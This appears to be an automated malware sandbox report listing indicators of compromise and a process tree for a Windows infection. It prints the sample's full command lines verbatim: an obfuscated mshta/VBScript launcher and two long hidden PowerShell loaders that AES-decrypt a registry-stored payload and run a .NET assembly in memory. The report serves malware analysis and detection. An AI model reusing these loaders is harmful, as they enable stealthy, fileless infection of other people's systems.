Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
$sxr-powershell.exepid process 2952 $sxr-powershell.exe -
Suspicious use of UnmapMainImage 3 IoCs
Processes:
RuntimeBroker.exeExplorer.EXEpid process 3908 RuntimeBroker.exe 3352 Explorer.EXE 3908 RuntimeBroker.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exemain.execmd.execmd.exeuni.bat.exe$sxr-mshta.exedescription pid process target process PID 3160 wrote to memory of 2432 3160 cmd.exe cmd.exe PID 3160 wrote to memory of 2432 3160 cmd.exe cmd.exe PID 3160 wrote to memory of 3080 3160 cmd.exe main.exe PID 3160 wrote to memory of 3080 3160 cmd.exe main.exe PID 3080 wrote to memory of 2284 3080 main.exe cmd.exe PID 3080 wrote to memory of 2284 3080 main.exe cmd.exe PID 2284 wrote to memory of 4428 2284 cmd.exe chcp.com PID 2284 wrote to memory of 4428 2284 cmd.exe chcp.com PID 2284 wrote to memory of 2848 2284 cmd.exe timeout.exe PID 2284 wrote to memory of 2848 2284 cmd.exe timeout.exe PID 2284 wrote to memory of 3384 2284 cmd.exe PING.EXE PID 2284 wrote to memory of 3384 2284 cmd.exe PING.EXE PID 2284 wrote to memory of 816 2284 cmd.exe PING.EXE PID 2284 wrote to memory of 816 2284 cmd.exe PING.EXE PID 2284 wrote to memory of 1944 2284 cmd.exe PING.EXE PID 2284 wrote to memory of 1944 2284 cmd.exe PING.EXE PID 2284 wrote to memory of 4108 2284 cmd.exe PING.EXE PID 2284 wrote to memory of 4108 2284 cmd.exe PING.EXE PID 2284 wrote to memory of 4156 2284 cmd.exe PING.EXE PID 2284 wrote to memory of 4156 2284 cmd.exe PING.EXE PID 2284 wrote to memory of 4568 2284 cmd.exe PING.EXE PID 2284 wrote to memory of 4568 2284 cmd.exe PING.EXE PID 2284 wrote to memory of 968 2284 cmd.exe PING.EXE PID 2284 wrote to memory of 968 2284 cmd.exe PING.EXE PID 2284 wrote to memory of 4548 2284 cmd.exe PING.EXE PID 2284 wrote to memory of 4548 2284 cmd.exe PING.EXE PID 2284 wrote to memory of 212 2284 cmd.exe PING.EXE PID 2284 wrote to memory of 212 2284 cmd.exe PING.EXE PID 2432 wrote to memory of 1292 2432 cmd.exe uni.bat.exe PID 2432 wrote to memory of 1292 2432 cmd.exe uni.bat.exe PID 2284 wrote to memory of 4728 2284 cmd.exe timeout.exe PID 2284 wrote to memory of 4728 2284 cmd.exe timeout.exe PID 2284 wrote to memory of 3848 2284 cmd.exe PING.EXE PID 2284 wrote to memory of 3848 2284 cmd.exe PING.EXE PID 2284 wrote to memory of 1116 2284 cmd.exe timeout.exe PID 2284 wrote to memory of 1116 2284 cmd.exe timeout.exe PID 2284 wrote to memory of 3320 2284 cmd.exe PING.EXE PID 2284 wrote to memory of 3320 2284 cmd.exe PING.EXE PID 1292 wrote to memory of 1548 1292 uni.bat.exe dllhost.exe PID 1292 wrote to memory of 1548 1292 uni.bat.exe dllhost.exe PID 1292 wrote to memory of 1548 1292 uni.bat.exe dllhost.exe PID 1292 wrote to memory of 1548 1292 uni.bat.exe dllhost.exe PID 1292 wrote to memory of 1548 1292 uni.bat.exe dllhost.exe PID 1292 wrote to memory of 1548 1292 uni.bat.exe dllhost.exe PID 2284 wrote to memory of 528 2284 cmd.exe timeout.exe PID 2284 wrote to memory of 528 2284 cmd.exe timeout.exe PID 1292 wrote to memory of 1548 1292 uni.bat.exe dllhost.exe PID 1292 wrote to memory of 392 1292 uni.bat.exe dllhost.exe PID 1292 wrote to memory of 392 1292 uni.bat.exe dllhost.exe PID 1292 wrote to memory of 392 1292 uni.bat.exe dllhost.exe PID 1292 wrote to memory of 392 1292 uni.bat.exe dllhost.exe PID 1292 wrote to memory of 392 1292 uni.bat.exe dllhost.exe PID 1292 wrote to memory of 392 1292 uni.bat.exe dllhost.exe PID 1292 wrote to memory of 392 1292 uni.bat.exe dllhost.exe PID 1292 wrote to memory of 392 1292 uni.bat.exe dllhost.exe PID 1292 wrote to memory of 392 1292 uni.bat.exe dllhost.exe PID 2284 wrote to memory of 4424 2284 cmd.exe PING.EXE PID 2284 wrote to memory of 4424 2284 cmd.exe PING.EXE PID 2284 wrote to memory of 4784 2284 cmd.exe timeout.exe PID 2284 wrote to memory of 4784 2284 cmd.exe timeout.exe PID 2284 wrote to memory of 3860 2284 cmd.exe PING.EXE PID 2284 wrote to memory of 3860 2284 cmd.exe PING.EXE PID 2136 wrote to memory of 4884 2136 $sxr-mshta.exe $sxr-cmd.exe PID 2136 wrote to memory of 4884 2136 $sxr-mshta.exe $sxr-cmd.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{79fadf7e-8df6-4487-a617-e306eec2d3ba}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{d89629a0-82a4-4a27-95bf-ae3956f11ebf}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{f8d1a293-7384-4c28-8084-1f5089de823b}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{2853466b-f643-4b06-9fd6-8d8cce1463f2}2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{016610a2-daa1-4cb8-a3e5-ed539abd9d3d}2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{a59355e1-7b91-429d-afff-848a99f787f3}2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{91ff53fa-a978-428e-8b84-1217adcb074c}2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5436 -s 4003⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{9fbc73e3-26b1-4669-b54b-177f885e1355}2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{2fb9d90c-55f8-49d5-a971-f50ee3a68bfe}2⤵
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\$sxr-mshta.exeC:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-fIvAWqRzQvWuAstOtyuG4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\$sxr-cmd.exe"C:\Windows\$sxr-cmd.exe" /c %$sxr-fIvAWqRzQvWuAstOtyuG4312:&#<?=%3⤵
- Executes dropped EXE
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\$sxr-powershell.exeC:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function cZwGr($wJEcK){ $AFKcp=[System.Security.Cryptography.Aes]::Create(); $AFKcp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $AFKcp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $AFKcp.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw='); $AFKcp.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A=='); $Czfqh=$AFKcp.('rotpyrceDetaerC'[-1..-15] -join '')(); $jNjPg=$Czfqh.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wJEcK, 0, $wJEcK.Length); $Czfqh.Dispose(); $AFKcp.Dispose(); $jNjPg;}function nyZgh($wJEcK){ $zAUTt=New-Object System.IO.MemoryStream(,$wJEcK); $GiIcD=New-Object System.IO.MemoryStream; $IbKVT=New-Object System.IO.Compression.GZipStream($zAUTt, [IO.Compression.CompressionMode]::Decompress); $IbKVT.CopyTo($GiIcD); $IbKVT.Dispose(); $zAUTt.Dispose(); $GiIcD.Dispose(); $GiIcD.ToArray();}function JitsM($wJEcK,$KvmVX){ $hfTYl=[System.Reflection.Assembly]::Load([byte[]]$wJEcK); $vpjLB=$hfTYl.EntryPoint; $vpjLB.Invoke($null, $KvmVX);}$AFKcp1 = New-Object System.Security.Cryptography.AesManaged;$AFKcp1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$AFKcp1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$AFKcp1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw=');$AFKcp1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A==');$MfWDX = $AFKcp1.('rotpyrceDetaerC'[-1..-15] -join '')();$OXRcs = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Ud8pMApbv/gxu+JXtMI7A==');$OXRcs = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs, 0, $OXRcs.Length);$OXRcs = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs);$MJSJO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3VJkIni/eEgLNMCmmbuF+9uJHd2ZxHH9BvEMmnfuAs4=');$MJSJO = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MJSJO, 0, $MJSJO.Length);$MJSJO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MJSJO);$eldAL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MUqFa/ybH7fq9E8cDwzQqA==');$eldAL = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($eldAL, 0, $eldAL.Length);$eldAL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($eldAL);$JmtWK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RNiqtzRUbqzid5tIIG0tdSQQSCND4N3Fip71HpyVpNu/LbAnkQDXvXCNN67DnhoH5Y27G2MJlveDAN7CWQjo2dJc4tmKQnvASHPTcy0RyGxkDhbwoL6OdXRgiYeimaZ3i49J/rxWBNL33jIrXjV6wccc/4aVjVPEYt/lsF5IHcTecs+F97GmTz/xlfrGHuS+klKIHdbsKNtk359gBlEuyIzqc8ZNoXjIsDYcHPmRQW0ppscjiU1/jln8klv2aIxKfUrd3GQUbnHsQMaMF/hqOHe+EY+XH4G0NlTI/p6Gfj6oZBnjn21FQDxykIFEupy9SA9V6u+rIOYPN2aHFGH15vJWjy68WQLa9uRRD0iNI3+fN5lBaMhngNS166V7oDsfk6HFYYqd4SbkPV+So/C260QI7aUZVElJYwH9zWeJN68=');$JmtWK = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JmtWK, 0, $JmtWK.Length);$JmtWK = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($JmtWK);$sutWG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('721Pgwb2TpdFalOhddbR8A==');$sutWG = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sutWG, 0, $sutWG.Length);$sutWG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sutWG);$RmeiH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sYsCTgz2k9CJtXOv5QOESQ==');$RmeiH = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RmeiH, 0, $RmeiH.Length);$RmeiH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RmeiH);$yKibX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5yBJCVjGNNI8c4y5TeJZ1g==');$yKibX = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($yKibX, 0, $yKibX.Length);$yKibX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($yKibX);$mWhwt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HFsj1rvOoFy/1AQ35wf56A==');$mWhwt = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mWhwt, 0, $mWhwt.Length);$mWhwt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mWhwt);$MQVoG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S8OL2bqVmk+GN3goxj/uiw==');$MQVoG = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MQVoG, 0, $MQVoG.Length);$MQVoG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MQVoG);$OXRcs0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('spJ+lRLXqmjOi3nI0UTS5g==');$OXRcs0 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs0, 0, $OXRcs0.Length);$OXRcs0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs0);$OXRcs1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U4iTk4zuVeeTIShJARv6Pg==');$OXRcs1 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs1, 0, $OXRcs1.Length);$OXRcs1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs1);$OXRcs2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9xaq7OLHlKH+W6faIqwAMw==');$OXRcs2 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs2, 0, $OXRcs2.Length);$OXRcs2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs2);$OXRcs3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JOLtcnTz9Wy99GrNQ2MuMQ==');$OXRcs3 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs3, 0, $OXRcs3.Length);$OXRcs3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs3);$MfWDX.Dispose();$AFKcp1.Dispose();if (@(get-process -ea silentlycontinue $OXRcs3).count -gt 1) {exit};$lJYQx = [Microsoft.Win32.Registry]::$mWhwt.$yKibX($OXRcs).$RmeiH($MJSJO);$mFwmU=[string[]]$lJYQx.Split('\');$xwjch=nyZgh(cZwGr([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mFwmU[1])));JitsM $xwjch (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$Alykr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mFwmU[0]);$AFKcp = New-Object System.Security.Cryptography.AesManaged;$AFKcp.Mode = [System.Security.Cryptography.CipherMode]::CBC;$AFKcp.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$AFKcp.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw=');$AFKcp.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A==');$Czfqh = $AFKcp.('rotpyrceDetaerC'[-1..-15] -join '')();$Alykr = $Czfqh.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Alykr, 0, $Alykr.Length);$Czfqh.Dispose();$AFKcp.Dispose();$zAUTt = New-Object System.IO.MemoryStream(, $Alykr);$GiIcD = New-Object System.IO.MemoryStream;$IbKVT = New-Object System.IO.Compression.GZipStream($zAUTt, [IO.Compression.CompressionMode]::$OXRcs1);$IbKVT.$MQVoG($GiIcD);$IbKVT.Dispose();$zAUTt.Dispose();$GiIcD.Dispose();$Alykr = $GiIcD.ToArray();$hUYCw = $JmtWK | IEX;$hfTYl = $hUYCw::$OXRcs2($Alykr);$vpjLB = $hfTYl.EntryPoint;$vpjLB.$OXRcs0($null, (, [string[]] ($eldAL)))4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{e6abd26e-4f26-4d3f-a608-88eb2a963baa}5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2952).WaitForExit();[System.Threading.Thread]::Sleep(5000); function cZwGr($wJEcK){ $AFKcp=[System.Security.Cryptography.Aes]::Create(); $AFKcp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $AFKcp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $AFKcp.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw='); $AFKcp.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A=='); $Czfqh=$AFKcp.('rotpyrceDetaerC'[-1..-15] -join '')(); $jNjPg=$Czfqh.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wJEcK, 0, $wJEcK.Length); $Czfqh.Dispose(); $AFKcp.Dispose(); $jNjPg;}function nyZgh($wJEcK){ $zAUTt=New-Object System.IO.MemoryStream(,$wJEcK); $GiIcD=New-Object System.IO.MemoryStream; $IbKVT=New-Object System.IO.Compression.GZipStream($zAUTt, [IO.Compression.CompressionMode]::Decompress); $IbKVT.CopyTo($GiIcD); $IbKVT.Dispose(); $zAUTt.Dispose(); $GiIcD.Dispose(); $GiIcD.ToArray();}function JitsM($wJEcK,$KvmVX){ $hfTYl=[System.Reflection.Assembly]::Load([byte[]]$wJEcK); $vpjLB=$hfTYl.EntryPoint; $vpjLB.Invoke($null, $KvmVX);}$AFKcp1 = New-Object System.Security.Cryptography.AesManaged;$AFKcp1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$AFKcp1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$AFKcp1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw=');$AFKcp1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A==');$MfWDX = $AFKcp1.('rotpyrceDetaerC'[-1..-15] -join '')();$OXRcs = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Ud8pMApbv/gxu+JXtMI7A==');$OXRcs = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs, 0, $OXRcs.Length);$OXRcs = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs);$MJSJO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3VJkIni/eEgLNMCmmbuF+9uJHd2ZxHH9BvEMmnfuAs4=');$MJSJO = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MJSJO, 0, $MJSJO.Length);$MJSJO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MJSJO);$eldAL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MUqFa/ybH7fq9E8cDwzQqA==');$eldAL = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($eldAL, 0, $eldAL.Length);$eldAL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($eldAL);$JmtWK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RNiqtzRUbqzid5tIIG0tdSQQSCND4N3Fip71HpyVpNu/LbAnkQDXvXCNN67DnhoH5Y27G2MJlveDAN7CWQjo2dJc4tmKQnvASHPTcy0RyGxkDhbwoL6OdXRgiYeimaZ3i49J/rxWBNL33jIrXjV6wccc/4aVjVPEYt/lsF5IHcTecs+F97GmTz/xlfrGHuS+klKIHdbsKNtk359gBlEuyIzqc8ZNoXjIsDYcHPmRQW0ppscjiU1/jln8klv2aIxKfUrd3GQUbnHsQMaMF/hqOHe+EY+XH4G0NlTI/p6Gfj6oZBnjn21FQDxykIFEupy9SA9V6u+rIOYPN2aHFGH15vJWjy68WQLa9uRRD0iNI3+fN5lBaMhngNS166V7oDsfk6HFYYqd4SbkPV+So/C260QI7aUZVElJYwH9zWeJN68=');$JmtWK = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JmtWK, 0, $JmtWK.Length);$JmtWK = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($JmtWK);$sutWG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('721Pgwb2TpdFalOhddbR8A==');$sutWG = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sutWG, 0, $sutWG.Length);$sutWG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sutWG);$RmeiH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sYsCTgz2k9CJtXOv5QOESQ==');$RmeiH = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RmeiH, 0, $RmeiH.Length);$RmeiH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RmeiH);$yKibX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5yBJCVjGNNI8c4y5TeJZ1g==');$yKibX = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($yKibX, 0, $yKibX.Length);$yKibX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($yKibX);$mWhwt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HFsj1rvOoFy/1AQ35wf56A==');$mWhwt = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mWhwt, 0, $mWhwt.Length);$mWhwt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mWhwt);$MQVoG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S8OL2bqVmk+GN3goxj/uiw==');$MQVoG = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MQVoG, 0, $MQVoG.Length);$MQVoG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MQVoG);$OXRcs0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('spJ+lRLXqmjOi3nI0UTS5g==');$OXRcs0 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs0, 0, $OXRcs0.Length);$OXRcs0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs0);$OXRcs1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U4iTk4zuVeeTIShJARv6Pg==');$OXRcs1 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs1, 0, $OXRcs1.Length);$OXRcs1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs1);$OXRcs2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9xaq7OLHlKH+W6faIqwAMw==');$OXRcs2 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs2, 0, $OXRcs2.Length);$OXRcs2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs2);$OXRcs3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JOLtcnTz9Wy99GrNQ2MuMQ==');$OXRcs3 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs3, 0, $OXRcs3.Length);$OXRcs3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs3);$MfWDX.Dispose();$AFKcp1.Dispose();if (@(get-process -ea silentlycontinue $OXRcs3).count -gt 1) {exit};$lJYQx = [Microsoft.Win32.Registry]::$mWhwt.$yKibX($OXRcs).$RmeiH($MJSJO);$mFwmU=[string[]]$lJYQx.Split('\');$xwjch=nyZgh(cZwGr([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mFwmU[1])));JitsM $xwjch (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$Alykr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mFwmU[0]);$AFKcp = New-Object System.Security.Cryptography.AesManaged;$AFKcp.Mode = [System.Security.Cryptography.CipherMode]::CBC;$AFKcp.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$AFKcp.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw=');$AFKcp.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A==');$Czfqh = $AFKcp.('rotpyrceDetaerC'[-1..-15] -join '')();$Alykr = $Czfqh.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Alykr, 0, $Alykr.Length);$Czfqh.Dispose();$AFKcp.Dispose();$zAUTt = New-Object System.IO.MemoryStream(, $Alykr);$GiIcD = New-Object System.IO.MemoryStream;$IbKVT = New-Object System.IO.Compression.GZipStream($zAUTt, [IO.Compression.CompressionMode]::$OXRcs1);$IbKVT.$MQVoG($GiIcD);$IbKVT.Dispose();$zAUTt.Dispose();$GiIcD.Dispose();$Alykr = $GiIcD.ToArray();$hUYCw = $JmtWK | IEX;$hfTYl = $hUYCw::$OXRcs2($Alykr);$vpjLB = $hfTYl.EntryPoint;$vpjLB.$OXRcs0($null, (, [string[]] ($eldAL)))5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{d3a31640-8106-4782-8406-e9e09d4670b8}5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{52fe0ff0-f713-4ff5-9a1f-fe8bef4a9b7b}5⤵
-
